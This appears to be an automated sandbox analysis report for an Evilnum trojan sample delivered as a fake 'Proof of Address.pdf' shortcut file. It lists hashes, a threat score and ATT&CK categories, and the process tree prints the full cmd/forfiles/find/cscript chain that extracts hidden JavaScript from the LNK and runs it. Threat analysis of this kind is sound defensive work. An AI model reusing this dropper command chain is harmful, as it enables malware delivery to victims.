evilnum | 7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6

Analysis

Target

7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6.lnk
Size

539KB
MD5

02bf629bd6a36b96e8215d41f58415ea
SHA1

4cdd87f5b9ab8c2afcd76e4b8127b0cb6e880cf1
SHA256

7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6
SHA512

ab206443885e308313978f089b802037a0993ce897d85f0b32820e4a8a8444a10b6a16a84df4fba33910ffb43d0a9300f332cde68ec8a560c9cec1d38b45cdfd

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2352 wrote to memory of 3024	2352	cmd.exe	69
PID 2352 wrote to memory of 3024	2352	cmd.exe	69
PID 3024 wrote to memory of 3740	3024	cmd.exe	70
PID 3024 wrote to memory of 3740	3024	cmd.exe	70
PID 3024 wrote to memory of 3376	3024	cmd.exe	71
PID 3024 wrote to memory of 3376	3024	cmd.exe	71
PID 3024 wrote to memory of 752	3024	cmd.exe	73
PID 3024 wrote to memory of 752	3024	cmd.exe	73
PID 3024 wrote to memory of 3548	3024	cmd.exe	72
PID 3024 wrote to memory of 3548	3024	cmd.exe	72
PID 3024 wrote to memory of 4060	3024	cmd.exe	74
PID 3024 wrote to memory of 4060	3024	cmd.exe	74

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Proof of Address.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Proo*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3024
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Proo*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:3740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:3548
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:752
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:4060

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact